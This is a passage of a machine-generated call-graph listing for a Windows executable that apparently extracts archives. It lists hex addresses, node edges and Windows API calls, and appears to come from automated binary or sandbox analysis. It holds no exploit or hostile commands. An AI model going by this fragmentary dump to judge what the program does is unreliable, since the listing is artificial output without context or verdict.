23556->23553 23557->23553 23559 f3c831 __EH_prolog 23558->23559 23560 f4e24a new 8 API calls 23559->23560 23561 f3c874 23560->23561 23562 f4e24a new 8 API calls 23561->23562 23563 f3c898 23562->23563 23563->23523 23567 f4e24f new 23564->23567 23565 f4e27b 23565->23525 23567->23565 23576 f571ad 7 API calls 2 library calls 23567->23576 23577 f4ecce RaiseException Concurrency::cancel_current_task new 23567->23577 23578 f4ecb1 RaiseException Concurrency::cancel_current_task 23567->23578 23571 f44415 __EH_prolog 23570->23571 23572 f4e24a new 8 API calls 23571->23572 23573 f44431 23572->23573 23574 f37ce6 23573->23574 23579 f406ba 78 API calls 23573->23579 23574->23528 23576->23567 23579->23574 23581 f38389 __EH_prolog 23580->23581 23609 f31380 23581->23609 23583 f383a4 23617 f39ef7 23583->23617 23589 f383d3 23737 f31631 23589->23737 23590 f3846e 23636 f38517 23590->23636 23594 f384ce 23640 f31f00 23594->23640 23597 f383cf 23597->23589 23597->23590 23599 f3a4c6 8 API calls 23597->23599 23741 f3bac4 CompareStringW 23597->23741 23598 f384d9 23598->23589 23644 f33aac 23598->23644 23654 f3857b 23598->23654 23599->23597 23603 f3a4db 23602->23603 23607 f3a4df 23603->23607 23988 f3a5f4 23603->23988 23605 f3a4ef 23606 f3a4f4 FindClose 23605->23606 23605->23607 23606->23607 23607->23529 23608->23531 23610 f31385 __EH_prolog 23609->23610 23611 f3c827 8 API calls 23610->23611 23612 f313bd 23611->23612 23613 f4e24a new 8 API calls 23612->23613 23616 f31416 ___scrt_fastfail 23612->23616 23614 f31403 23613->23614 23614->23616 23743 f3b07d 23614->23743 23616->23583 23618 f39f0e 23617->23618 23620 f383ba 23618->23620 23759 f36f5d 76 API calls 23618->23759 23620->23589 23621 f319a6 23620->23621 23622 f319b0 __EH_prolog 23621->23622 23632 f31a00 23622->23632 23634 f319e5 23622->23634 23760 f3709d 23622->23760 23624 f31b50 23763 f36dc1 74 API calls 23624->23763 23626 f33aac 97 API calls 23630 f31bb3 23626->23630 23627 f31b60 23627->23626 23627->23634 23628 f31bff 23628->23634 23635 f31c32 23628->23635 23764 f36dc1 74 API calls 23628->23764 23630->23628 23631 f33aac 97 API calls 23630->23631 23631->23630 23632->23624 23632->23627 23632->23634 23633 f33aac 97 API calls 23633->23635 23634->23597 23635->23633 23635->23634 23637 f38524 23636->23637 23782 f40c26 GetSystemTime SystemTimeToFileTime 23637->23782 23639 f38488 23639->23594 23742 f41359 72 API calls 23639->23742 23642 f31f05 __EH_prolog 23640->23642 23641 f31f39 23641->23598 23642->23641 23784 f31951 23642->23784 23645 f33ab8 23644->23645 23646 f33abc 23644->23646 23645->23598 23647 f33af7 23646->23647 23648 f33ae9 23646->23648 23919 f327e8 97 API calls 3 library calls 23647->23919 23652 f33b29 23648->23652 23918 f33281 85 API calls 3 library calls 23648->23918 23651 f33af5 23651->23652 23920 f3204e 74 API calls 23651->23920 23652->23598 23655 f38585 __EH_prolog 23654->23655 23656 f385be 23655->23656 23664 f385c2 23655->23664 23942 f484bd 99 API calls 23655->23942 23657 f385e7 23656->23657 23660 f3867a 23656->23660 23656->23664 23658 f38609 23657->23658 23657->23664 23943 f37b66 151 API calls 23657->23943 23658->23664 23944 f484bd 99 API calls 23658->23944 23660->23664 23921 f35e3a 23660->23921 23664->23598 23665 f38705 23665->23664 23927 f3826a 23665->23927 23668 f38875 23669 f3a4c6 8 API calls 23668->23669 23673 f388e0 23668->23673 23669->23673 23671 f3c991 80 API calls 23675 f3893b _memcmp 23671->23675 23672 f38a70 23674 f38b43 23672->23674 23681 f38abf 23672->23681 23931 f37d6c 23673->23931 23679 f38b9e 23674->23679 23691 f38b4e 23674->23691 23675->23664 23675->23671 23675->23672 23676 f38a69 23675->23676 23945 f38236 82 API calls 23675->23945 23946 f31f94 74 API calls 23675->23946 23947 f31f94 74 API calls 23676->23947 23689 f38b30 23679->23689 23950 f380ea 96 API calls 23679->23950 23680 f38b9c 23683 f39653 79 API calls 23680->23683 23684 f3a180 4 API calls 23681->23684 23681->23689 23682 f39653 79 API calls 23682->23664 23683->23664 23688 f38af7 23684->23688 23686 f38c09 23687 f38c74 23686->23687 23736 f391c1 pre_c_initialization 23686->23736 23951 f39989 23686->23951 23692 f3aa88 8 API calls 23687->23692 23688->23689 23948 f39377 96 API calls 23688->23948 23689->23680 23689->23686 23691->23680 23949 f37f26 100 API calls pre_c_initialization 23691->23949 23695 f38cc3 23692->23695 23693 f38c4c 23693->23687 23955 f31f94 74 API calls 23693->23955 23697 f3aa88 8 API calls 23695->23697 23715 f38cd9 23697->23715 23699 f38c62 23956 f37061 75 API calls 23699->23956 23701 f38d9c 23702 f38df7 23701->23702 23703 f38efd 23701->23703 23704 f38e69 23702->23704 23707 f38e07 23702->23707 23705 f38f23 23703->23705 23706 f38f0f 23703->23706 23724 f38e27 23703->23724 23708 f3826a CharUpperW 23704->23708 23712 f42c42 75 API calls 23705->23712 23711 f392e6 121 API calls 23706->23711 23709 f38e4d 23707->23709 23716 f38e15 23707->23716 23710 f38e84 23708->23710 23709->23724 23959 f37907 108 API calls 23709->23959 23720 f38eb4 23710->23720 23721 f38ead 23710->23721 23710->23724 23711->23724 23714 f38f3c 23712->23714 23962 f428f1 121 API calls 23714->23962 23715->23701 23957 f39b21 SetFilePointer GetLastError SetEndOfFile 23715->23957 23958 f31f94 74 API calls 23716->23958 23961 f39224 94 API calls __EH_prolog 23720->23961 23960 f37698 84 API calls pre_c_initialization 23721->23960 23727 f3904b 23724->23727 23963 f31f94 74 API calls 23724->23963 23726 f39156 23728 f3a444 4 API calls 23726->23728 23726->23736 23727->23726 23729 f39104 23727->23729 23727->23736 23964 f39ebf SetEndOfFile 23727->23964 23730 f391b1 23728->23730 23937 f39d62 23729->23937 23730->23736 23965 f31f94 74 API calls 23730->23965 23733 f3914b 23734 f396d0 75 API calls 23733->23734 23734->23726 23736->23682 23738 f31643 23737->23738 23980 f3c8ca 23738->23980 23741->23597 23742->23594 23744 f3b087 __EH_prolog 23743->23744 23749 f3ea80 80 API calls 23744->23749 23746 f3b099 23750 f3b195 23746->23750 23749->23746 23751 f3b1a7 ___scrt_fastfail 23750->23751 23754 f40948 23751->23754 23757 f40908 GetCurrentProcess GetProcessAffinityMask 23754->23757 23758 f3b10f 23757->23758 23758->23616 23759->23620 23765 f316d2 23760->23765 23762 f370b9 23762->23632 23763->23634 23764->23635 23766 f316e8 23765->23766 23777 f31740 __vswprintf_c_l 23765->23777 23767 f31711 23766->23767 23778 f36e91 74 API calls __vswprintf_c_l 23766->23778 23768 f31767 23767->23768 23769 f3172d new 23767->23769 23772 f535de 22 API calls 23768->23772 23769->23777 23780 f36efd 75 API calls 23769->23780 23771 f31707 23779 f36efd 75 API calls 23771->23779 23774 f3176e 23772->23774 23774->23777 23781 f36efd 75 API calls 23774->23781 23777->23762 23778->23771 23779->23767 23780->23777 23781->23777 23783 f40c56 __vswprintf_c_l 23782->23783 23783->23639 23785 f3195d 23784->23785 23786 f31961 23784->23786 23785->23641 23788 f31896 23786->23788 23789 f318a8 23788->23789 23790 f318e5 23788->23790 23791 f33aac 97 API calls 23789->23791 23796 f33f18 23790->23796 23794 f318c8 23791->23794 23794->23785 23800 f33f21 23796->23800 23797 f33aac 97 API calls 23797->23800 23798 f31906 23798->23794 23801 f31e00 23798->23801 23800->23797 23800->23798 23813 f4067c 23800->23813 23802 f31e0a __EH_prolog 23801->23802 23821 f33b3d 23802->23821 23804 f31e34 23805 f316d2 76 API calls 23804->23805 23807 f31ebb 23804->23807 23806 f31e4b 23805->23806 23849 f31849 76 API calls 23806->23849 23807->23794 23809 f31e63 23811 f31e6f 23809->23811 23850 f4137a MultiByteToWideChar 23809->23850 23851 f31849 76 API calls 23811->23851 23814 f40683 23813->23814 23815 f4069e 23814->23815 23819 f36e8c RaiseException Concurrency::cancel_current_task 23814->23819 23817 f406af SetThreadExecutionState 23815->23817 23820 f36e8c RaiseException Concurrency::cancel_current_task 23815->23820 23817->23800 23819->23815 23820->23817 23822 f33b47 __EH_prolog 23821->23822 23823 f33b79 23822->23823 23824 f33b5d 23822->23824 23825 f33dc2 23823->23825 23829 f33ba5 23823->23829 23880 f36dc1 74 API calls 23824->23880 23897 f36dc1 74 API calls 23825->23897 23828 f33b68 23828->23804 23829->23828 23852 f42c42 23829->23852 23831 f33c26 23832 f33cb1 23831->23832 23848 f33c1d 23831->23848 23883 f3c991 23831->23883 23865 f3aa88 23832->23865 23833 f33c22 23833->23831 23882 f32034 76 API calls 23833->23882 23835 f33c12 23881 f36dc1 74 API calls 23835->23881 23836 f33bf4 23836->23831 23836->23833 23836->23835 23841 f33cc4 23842 f33d48 23841->23842 23843 f33d3e 23841->23843 23889 f428f1 121 API calls 23842->23889 23869 f392e6 23843->23869 23846 f33d46 23846->23848 23890 f31f94 74 API calls 23846->23890 23891 f41acf 23848->23891 23849->23809 23850->23811 23851->23807 23853 f42c51 23852->23853 23855 f42c5b 23852->23855 23898 f36efd 75 API calls 23853->23898 23856 f42ca2 new 23855->23856 23857 f42c9d Concurrency::cancel_current_task 23855->23857 23864 f42cfd ___scrt_fastfail 23855->23864 23859 f42da9 Concurrency::cancel_current_task 23856->23859 23860 f42cd9 23856->23860 23856->23864 23900 f5157a RaiseException 23857->23900 23901 f5157a RaiseException 23859->23901 23899 f42b7b 75 API calls 3 library calls 23860->23899 23863 f42dc1 23864->23836 23866 f3aa9f 23865->23866 23867 f3aa95 23865->23867 23866->23841 23868 f4e24a new 8 API calls 23867->23868 23868->23866 23870 f392f0 __EH_prolog 23869->23870 23902 f37dc6 23870->23902 23873 f3709d 76 API calls 23874 f39302 23873->23874 23905 f3ca6c 23874->23905 23876 f3935c 23876->23846 23878 f3ca6c 114 API calls 23879 f39314 23878->23879 23879->23876 23879->23878 23914 f3cc51 97 API calls __vswprintf_c_l 23879->23914 23880->23828 23881->23848 23882->23831 23884 f3c9b2 23883->23884 23885 f3c9c4 23883->23885 23915 f36249 80 API calls 23884->23915 23916 f36249 80 API calls 23885->23916 23888 f3c9bc 23888->23832 23889->23846 23890->23848 23893 f41ad9 23891->23893 23892 f41af2 23917 f4075b 84 API calls 23892->23917 23893->23892 23896 f41b06 23893->23896 23895 f41af9 23895->23896 23897->23828 23898->23855 23899->23864 23900->23859 23901->23863 23903 f3acf5 GetVersionExW 23902->23903 23904 f37dcb 23903->23904 23904->23873 23912 f3ca82 __vswprintf_c_l 23905->23912 23906 f3cbf7 23907 f3cc1f 23906->23907 23908 f3ca0b 6 API calls 23906->23908 23909 f4067c SetThreadExecutionState RaiseException 23907->23909 23908->23907 23910 f3cbee 23909->23910 23910->23879 23911 f484bd 99 API calls 23911->23912 23912->23906 23912->23910 23912->23911 23913 f3ab70 89 API calls 23912->23913 23913->23912 23914->23879 23915->23888 23916->23888 23917->23895 23918->23651 23919->23651 23920->23652 23922 f35e4a 23921->23922 23966 f35d67 23922->23966 23925 f35e7d 23926 f35eb5 23925->23926 23971 f3ad65 CharUpperW CompareStringW 23925->23971 23926->23665 23929 f38289 23927->23929 23977 f4179d CharUpperW 23929->23977 23930 f38333 23930->23668 23932 f37d7b 23931->23932 23933 f37dbb 23932->23933 23978 f37043 74 API calls 23932->23978 23933->23675 23935 f37db3 23979 f36dc1 74 API calls 23935->23979 23938 f39d73 23937->23938 23941 f39d82 23937->23941 23939 f39d79 FlushFileBuffers 23938->23939 23938->23941 23939->23941 23940 f39dfb SetFileTime 23940->23733 23941->23940 23942->23656 23943->23658 23944->23664 23945->23675 23946->23675 23947->23672 23948->23689 23949->23680 23950->23689 23952 f39992 GetFileType 23951->23952 23953 f3998f 23951->23953 23954 f399a0 23952->23954 23953->23693 23954->23693 23955->23699 23956->23687 23957->23701 23958->23724 23959->23724 23960->23724 23961->23724 23962->23724 23963->23727 23964->23729 23965->23736 23972 f35c64 23966->23972 23968 f35d88 23968->23925 23970 f35c64 2 API calls 23970->23968 23971->23925 23973 f35c6e 23972->23973 23975 f35d56 23973->23975 23976 f3ad65 CharUpperW CompareStringW 23973->23976 23975->23968 23975->23970 23976->23973 23977->23930 23978->23935 23979->23933 23981 f3c8db 23980->23981 23986 f3a90e 84 API calls 23981->23986 23983 f3c90d 23987 f3a90e 84 API calls 23983->23987 23985 f3c918 23986->23983 23987->23985 23989 f3a5fe 23988->23989 23990 f3a691 FindNextFileW 23989->23990 23991 f3a621 FindFirstFileW 23989->23991 23993 f3a6b0 23990->23993 23994 f3a69c GetLastError 23990->23994 23992 f3a638 23991->23992 23999 f3a675 23991->23999 23995 f3b66c 2 API calls 23992->23995 23993->23999 23994->23993 23996 f3a64d 23995->23996 23997 f3a651 FindFirstFileW 23996->23997 23998 f3a66a GetLastError 23996->23998 23997->23998 23997->23999 23998->23999 23999->23605 24009 f49d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24000->24009 24002 f49d21 24003 f49d2d 24002->24003 24010 f49d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24002->24010 24003->23354 24003->23355 24005->23360 24006->23364 24007->23364 24008->23367 24009->24002 24010->24003 24011->23373 24013 f39ef7 76 API calls 24012->24013 24014 f31f5b 24013->24014 24015 f319a6 97 API calls 24014->24015 24018 f31f78 24014->24018 24016 f31f68 24015->24016 24016->24018 24019 f36dc1 74 API calls 24016->24019 24018->23381 24018->23382 24019->24018 24814 f4b8e0 93 API calls _swprintf 24815 f48ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24818 f616e0 CloseHandle 24819 f4acd0 100 API calls 24866 f419d0 26 API calls std::bad_exception::bad_exception 24025 f310d5 24030 f35bd7 24025->24030 24031 f35be1 __EH_prolog 24030->24031 24032 f3b07d 82 API calls 24031->24032 24033 f35bed 24032->24033 24037 f35dcc GetCurrentProcess GetProcessAffinityMask 24033->24037 24038 f4ead2 24039 f4eade ___BuildCatchObject 24038->24039 24064 f4e5c7 24039->24064 24041 f4eae5 24043 f4eb0e 24041->24043 24144 f4ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24041->24144 24047 f4eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24043->24047 24075 f5824d 24043->24075 24049 f4ebad 24047->24049 24145 f57243 38 API calls 2 library calls 24047->24145 24048 f4eb2d ___BuildCatchObject 24083 f4f020 24049->24083 24059 f4ebd9 24061 f4ebe2 24059->24061 24146 f5764a 28 API calls _abort 24059->24146 24147 f4e73e 13 API calls 2 library calls 24061->24147 24065 f4e5d0 24064->24065 24148 f4ed5b IsProcessorFeaturePresent 24065->24148 24067 f4e5dc 24149 f52016 24067->24149 24069 f4e5e1 24070 f4e5e5 24069->24070 24158 f580d7 24069->24158 24070->24041 24073 f4e5fc 24073->24041 24078 f58264 24075->24078 24076 f4ec4a TranslatorGuardHandler 5 API calls 24077 f4eb27 24076->24077 24077->24048 24079 f581f1 24077->24079 24078->24076 24082 f58220 24079->24082 24080 f4ec4a TranslatorGuardHandler 5 API calls 24081 f58249 24080->24081 24081->24047 24082->24080 24208 f4f350 24083->24208 24086 f4ebb3 24087 f5819e 24086->24087 24210 f5b290 24087->24210 24089 f4ebbc 24092 f4d5d4 24089->24092 24091 f581a7 24091->24089 24214 f5b59a 38 API calls 24091->24214 24349 f400cf 24092->24349 24096 f4d5f3 24398 f4a335 24096->24398 24098 f4d5fc 24402 f413b3 GetCPInfo 24098->24402 24100 f4d606 ___scrt_fastfail 24101 f4d619 GetCommandLineW 24100->24101 24102 f4d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24101->24102 24103 f4d628 24101->24103 24104 f3400a _swprintf 51 API calls 24102->24104 24405 f4bc84 24103->24405 24106 f4d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24104->24106 24416 f4aded LoadBitmapW 24106->24416 24109 f4d636 OpenFileMappingW 24111 f4d696 CloseHandle 24109->24111 24112 f4d64f MapViewOfFile 24109->24112 24110 f4d6a0 24410 f4d287 24110->24410 24111->24102 24115 f4d660 __vswprintf_c_l 24112->24115 24116 f4d68d UnmapViewOfFile 24112->24116 24121 f4d287 2 API calls 24115->24121 24116->24111 24123 f4d67c 24121->24123 24122 f48835 8 API calls 24124 f4d76a DialogBoxParamW 24122->24124 24123->24116 24125 f4d7a4 24124->24125 24126 f4d7b6 Sleep 24125->24126 24127 f4d7bd 24125->24127 24126->24127 24129 f4d7cb 24127->24129 24446 f4a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24127->24446 24130 f4d7ea DeleteObject 24129->24130 24131 f4d806 24130->24131 24132 f4d7ff DeleteObject 24130->24132 24133 f4d837 24131->24133 24134 f4d849 24131->24134 24132->24131 24447 f4d2e6 6 API calls 24133->24447 24443 f4a39d 24134->24443 24137 f4d83d CloseHandle 24137->24134 24138 f4d883 24139 f5757e GetModuleHandleW 24138->24139 24140 f4ebcf 24139->24140 24140->24059 24141 f576a7 24140->24141 24581 f57424 24141->24581 24144->24041 24145->24049 24146->24061 24147->24048 24148->24067 24150 f5201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24149->24150 24162 f5310e 24150->24162 24153 f52029 24153->24069 24155 f52031 24156 f5203c 24155->24156 24176 f5314a DeleteCriticalSection 24155->24176 24156->24069 24204 f5b73a 24158->24204 24161 f5203f 8 API calls 3 library calls 24161->24070 24163 f53117 24162->24163 24165 f53140 24163->24165 24166 f52025 24163->24166 24177 f53385 24163->24177 24182 f5314a DeleteCriticalSection 24165->24182 24166->24153 24168 f5215c 24166->24168 24197 f5329a 24168->24197 24170 f52166 24175 f52171 24170->24175 24202 f53348 6 API calls try_get_function 24170->24202 24172 f5217f 24173 f5218c 24172->24173 24203 f5218f 6 API calls ___vcrt_FlsFree 24172->24203 24173->24155 24175->24155 24176->24153 24183 f53179 24177->24183 24180 f533bc InitializeCriticalSectionAndSpinCount 24181 f533a8 24180->24181 24181->24163 24182->24166 24184 f531ad 24183->24184 24187 f531a9 24183->24187 24184->24180 24184->24181 24185 f531cd 24185->24184 24188 f531d9 GetProcAddress 24185->24188 24187->24184 24187->24185 24190 f53219 24187->24190 24189 f531e9 __crt_fast_encode_pointer 24188->24189 24189->24184 24191 f53241 LoadLibraryExW 24190->24191 24195 f53236 24190->24195 24192 f53275 24191->24192 24193 f5325d GetLastError 24191->24193 24192->24195 24196 f5328c FreeLibrary 24192->24196 24193->24192 24194 f53268 LoadLibraryExW 24193->24194 24194->24192 24195->24187 24196->24195 24198 f53179 try_get_function 5 API calls 24197->24198 24199 f532b4 24198->24199 24200 f532cc TlsAlloc 24199->24200 24201 f532bd 24199->24201 24201->24170 24202->24172 24203->24175 24207 f5b753 24204->24207 24205 f4ec4a TranslatorGuardHandler 5 API calls 24206 f4e5ee 24205->24206 24206->24073 24206->24161 24207->24205 24209 f4f033 GetStartupInfoW 24208->24209 24209->24086 24211 f5b299 24210->24211 24212 f5b2a2 24210->24212 24215 f5b188 24211->24215 24212->24091 24214->24091 24216 f58fa5 _abort 38 API calls 24215->24216 24217 f5b195 24216->24217 24235 f5b2ae 24217->24235 24219 f5b19d 24244 f5af1b 24219->24244 24222 f5b1b4 24222->24212 24223 f58518 __onexit 21 API calls 24224 f5b1c5 24223->24224 24231 f5b1f7 24224->24231 24251 f5b350 24224->24251 24227 f584de _free 20 API calls 24227->24222 24228 f5b1f2 24261 f5895a 20 API calls __dosmaperr 24228->24261 24229 f5b20f 24232 f5b23b 24229->24232 24233 f584de _free 20 API calls 24229->24233 24231->24227 24232->24231 24262 f5adf1 26 API calls 24232->24262 24233->24232 24236 f5b2ba ___BuildCatchObject 24235->24236 24237 f58fa5 _abort 38 API calls 24236->24237 24242 f5b2c4 24237->24242 24239 f5b348 ___BuildCatchObject 24239->24219 24242->24239 24243 f584de _free 20 API calls 24242->24243 24263 f58566 38 API calls _abort 24242->24263 24264 f5a3f1 EnterCriticalSection 24242->24264 24265 f5b33f LeaveCriticalSection _abort 24242->24265 24243->24242 24245 f53dd6 __cftof 38 API calls 24244->24245 24246 f5af2d 24245->24246 24247 f5af3c GetOEMCP 24246->24247 24248 f5af4e 24246->24248 24249 f5af65 24247->24249 24248->24249 24250 f5af53 GetACP 24248->24250 24249->24222 24249->24223 24250->24249 24252 f5af1b 40 API calls 24251->24252 24253 f5b36f 24252->24253 24256 f5b3c0 IsValidCodePage 24253->24256 24258 f5b376 24253->24258 24260 f5b3e5 ___scrt_fastfail 24253->24260 24254 f4ec4a TranslatorGuardHandler 5 API calls 24255 f5b1ea 24254->24255 24255->24228 24255->24229 24257 f5b3d2 GetCPInfo 24256->24257 24256->24258 24257->24258 24257->24260 24258->24254 24266 f5aff4 GetCPInfo 24260->24266 24261->24231 24262->24231 24264->24242 24265->24242 24270 f5b02e 24266->24270 24275 f5b0d8 24266->24275 24269 f4ec4a TranslatorGuardHandler 5 API calls 24272 f5b184 24269->24272 24276 f5c099 24270->24276 24272->24258 24274 f5a275 __vswprintf_c_l 43 API calls 24274->24275 24275->24269 24277 f53dd6 __cftof 38 API calls 24276->24277 24278 f5c0b9 MultiByteToWideChar 24277->24278 24280 f5c0f7 24278->24280 24288 f5c18f 24278->24288 24282 f5c118 __vsnwprintf_l ___scrt_fastfail 24280->24282 24283 f58518 __onexit 21 API calls 24280->24283 24281 f4ec4a TranslatorGuardHandler 5 API calls 24284 f5b08f 24281->24284 24285 f5c189 24282->24285 24287 f5c15d MultiByteToWideChar 24282->24287 24283->24282 24290 f5a275 24284->24290 24295 f5a2c0 20 API calls _free 24285->24295 24287->24285 24289 f5c179 GetStringTypeW 24287->24289 24288->24281 24289->24285 24291 f53dd6 __cftof 38 API calls 24290->24291 24292 f5a288 24291->24292 24296 f5a058 24292->24296 24295->24288 24297 f5a073 __vswprintf_c_l 24296->24297 24298 f5a099 MultiByteToWideChar 24297->24298 24299 f5a24d 24298->24299 24300 f5a0c3 24298->24300 24301 f4ec4a TranslatorGuardHandler 5 API calls 24299->24301 24303 f58518 __onexit 21 API calls 24300->24303 24305 f5a0e4 __vsnwprintf_l 24300->24305 24302 f5a260 24301->24302 24302->24274 24303->24305 24304 f5a12d MultiByteToWideChar 24306 f5a146 24304->24306 24319 f5a199 24304->24319 24305->24304 24305->24319 24323 f5a72c 24306->24323 24310 f5a170 24314 f5a72c __vswprintf_c_l 11 API calls 24310->24314 24310->24319 24311 f5a1a8 24312 f5a1c9 __vsnwprintf_l 24311->24312 24315 f58518 __onexit 21 API calls 24311->24315 24313 f5a23e 24312->24313 24316 f5a72c __vswprintf_c_l 11 API calls 24312->24316 24331 f5a2c0 20 API calls _free 24313->24331 24314->24319 24315->24312 24318 f5a21d 24316->24318 24318->24313 24320 f5a22c WideCharToMultiByte 24318->24320 24332 f5a2c0 20 API calls _free 24319->24332 24320->24313 24321 f5a26c 24320->24321 24333 f5a2c0 20 API calls _free 24321->24333 24334 f5a458 24323->24334 24327 f5a79c LCMapStringW 24328 f5a75c 24327->24328 24329 f4ec4a TranslatorGuardHandler 5 API calls 24328->24329 24330 f5a15d 24329->24330 24330->24310 24330->24311 24330->24319 24331->24319 24332->24299 24333->24319 24335 f5a488 24334->24335 24339 f5a484 24334->24339 24335->24328 24341 f5a7b4 10 API calls 3 library calls 24335->24341 24336 f5a4a8 24336->24335 24338 f5a4b4 GetProcAddress 24336->24338 24340 f5a4c4 __crt_fast_encode_pointer 24338->24340 24339->24335 24339->24336 24342 f5a4f4 24339->24342 24340->24335 24341->24327 24343 f5a515 LoadLibraryExW 24342->24343 24344 f5a50a 24342->24344 24345 f5a532 GetLastError 24343->24345 24347 f5a54a 24343->24347 24344->24339 24346 f5a53d LoadLibraryExW 24345->24346 24345->24347 24346->24347 24347->24344 24348 f5a561 FreeLibrary 24347->24348 24348->24344 24350 f4e360 24349->24350 24351 f400d9 GetModuleHandleW 24350->24351 24352 f40154 24351->24352 24353 f400f0 GetProcAddress 24351->24353 24354 f40484 GetModuleFileNameW 24352->24354 24457 f570dd 42 API calls 2 library calls 24352->24457 24355 f40121 GetProcAddress 24353->24355 24356 f40109 24353->24356 24367 f404a3 24354->24367 24355->24352 24358 f40133 24355->24358 24356->24355 24358->24352 24359 f403be 24359->24354 24360 f403c9 GetModuleFileNameW CreateFileW 24359->24360 24361 f403fc SetFilePointer 24360->24361 24362 f40478 CloseHandle 24360->24362 24361->24362 24363 f4040c ReadFile 24361->24363 24362->24354 24363->24362 24365 f4042b 24363->24365 24365->24362 24369 f40085 2 API calls 24365->24369 24368 f404d2 CompareStringW 24367->24368 24370 f40508 GetFileAttributesW 24367->24370 24371 f40520 24367->24371 24448 f3acf5 24367->24448 24451 f40085 24367->24451 24368->24367 24369->24365 24370->24367 24370->24371 24372 f4052a 24371->24372 24374 f40560 24371->24374 24375 f40542 GetFileAttributesW 24372->24375 24377 f4055a 24372->24377 24373 f4066f 24397 f49da4 GetCurrentDirectoryW 24373->24397 24374->24373 24376 f3acf5 GetVersionExW 24374->24376 24375->24372 24375->24377 24378 f4057a 24376->24378 24377->24374 24379 f405e7 24378->24379 24380 f40581 24378->24380 24381 f3400a _swprintf 51 API calls 24379->24381 24382 f40085 2 API calls 24380->24382 24383 f4060f AllocConsole 24381->24383 24384 f4058b 24382->24384 24385 f40667 ExitProcess 24383->24385 24386 f4061c GetCurrentProcessId AttachConsole 24383->24386 24387 f40085 2 API calls 24384->24387 24458 f535b3 24386->24458 24389 f40595 24387->24389 24391 f3ddd1 53 API calls 24389->24391 24390 f4063d GetStdHandle WriteConsoleW Sleep FreeConsole 24390->24385 24392 f405b0 24391->24392 24393 f3400a _swprintf 51 API calls 24392->24393 24394 f405c3 24393->24394 24395 f3ddd1 53 API calls 24394->24395 24396 f405d2 24395->24396 24396->24385 24397->24096 24399 f40085 2 API calls 24398->24399 24400 f4a349 OleInitialize 24399->24400 24401 f4a36c GdiplusStartup SHGetMalloc 24400->24401 24401->24098 24403 f413d7 IsDBCSLeadByte 24402->24403 24403->24403 24404 f413ef 24403->24404 24404->24100 24409 f4bc8e 24405->24409 24406 f4bda4 24406->24109 24406->24110 24407 f4179d CharUpperW 24407->24409 24409->24406 24409->24407 24460 f3ecad 80 API calls ___scrt_fastfail 24409->24460 24411 f4e360 24410->24411 24412 f4d294 SetEnvironmentVariableW 24411->24412 24413 f4d2b7 24412->24413 24414 f4d2df 24413->24414 24415 f4d2d3 SetEnvironmentVariableW 24413->24415 24414->24102 24415->24414 24417 f4ae15 24416->24417 24418 f4ae0e 24416->24418 24420 f4ae2a 24417->24420 24421 f4ae1b GetObjectW 24417->24421 24461 f49e1c FindResourceW 24418->24461 24422 f49d1a 4 API calls 24420->24422 24421->24420 24424 f4ae3d 24422->24424 24423 f4ae80 24435 f3d31c 24423->24435 24424->24423 24425 f4ae5c 24424->24425 24427 f49e1c 12 API calls 24424->24427 24475 f49d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24425->24475 24428 f4ae4d 24427->24428 24428->24425 24430 f4ae53 DeleteObject 24428->24430 24429 f4ae64 24476 f49d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24429->24476 24430->24425 24432 f4ae6d 24477 f49f5d 8 API calls ___scrt_fastfail 24432->24477 24434 f4ae74 DeleteObject 24434->24423 24486 f3d341 24435->24486 24437 f3d328 24526 f3da4e GetModuleHandleW FindResourceW 24437->24526 24440 f48835 24441 f4e24a new 8 API calls 24440->24441 24442 f48854 24441->24442 24442->24122 24444 f4a3cc GdiplusShutdown OleUninitialize 24443->24444 24444->24138 24446->24129 24447->24137 24449 f3ad09 GetVersionExW 24448->24449 24450 f3ad45 24448->24450 24449->24450 24450->24367 24452 f4e360 24451->24452 24453 f40092 GetSystemDirectoryW 24452->24453 24454 f400c8 24453->24454 24455 f400aa 24453->24455 24454->24367 24456 f400bb LoadLibraryW 24455->24456 24456->24454 24457->24359 24459 f535bb 24458->24459 24459->24390 24459->24459 24460->24409 24462 f49e3e SizeofResource 24461->24462 24463 f49e70 24461->24463 24462->24463 24464 f49e52 LoadResource 24462->24464 24463->24417 24464->24463 24465 f49e63 LockResource 24464->24465 24465->24463 24466 f49e77 GlobalAlloc 24465->24466 24466->24463 24467 f49e92 GlobalLock 24466->24467 24468 f49f21 GlobalFree 24467->24468 24469 f49ea1 __vswprintf_c_l 24467->24469 24468->24463 24470 f49f1a GlobalUnlock 24469->24470 24478 f49d7b GdipAlloc 24469->24478 24470->24468 24473 f49eef GdipCreateHBITMAPFromBitmap 24474 f49f05 24473->24474 24474->24470 24475->24429 24476->24432 24477->24434 24479 f49d9a 24478->24479 24480 f49d8d 24478->24480 24479->24470 24479->24473 24479->24474 24482 f49b0f 24480->24482 24483 f49b37 GdipCreateBitmapFromStream 24482->24483 24484 f49b30 GdipCreateBitmapFromStreamICM 24482->24484 24485 f49b3c 24483->24485 24484->24485 24485->24479 24487 f3d34b _wcschr __EH_prolog 24486->24487 24488 f3d37a GetModuleFileNameW 24487->24488 24489 f3d3ab 24487->24489 24490 f3d394 24488->24490 24528 f399b0 24489->24528 24490->24489 24492 f3d3db 24497 f43781 76 API calls 24492->24497 24499 f3d407 24492->24499 24521 f3d627 24492->24521 24493 f39653 79 API calls 24494 f3d7ab 24493->24494 24494->24437 24496 f3d41a 24540 f55a90 26 API calls 3 library calls 24496->24540 24497->24492 24539 f55a90 26 API calls 3 library calls 24499->24539 24500 f3d563 24500->24521 24558 f39d30 77 API calls 24500->24558 24504 f3d57d new 24505 f39bf0 80 API calls 24504->24505 24504->24521 24508 f3d5a6 new 24505->24508 24507 f3d42c 24507->24500 24507->24521 24541 f39e40 24507->24541 24549 f39bf0 24507->24549 24557 f39d30 77 API calls 24507->24557 24508->24521 24523 f3d5b2 new 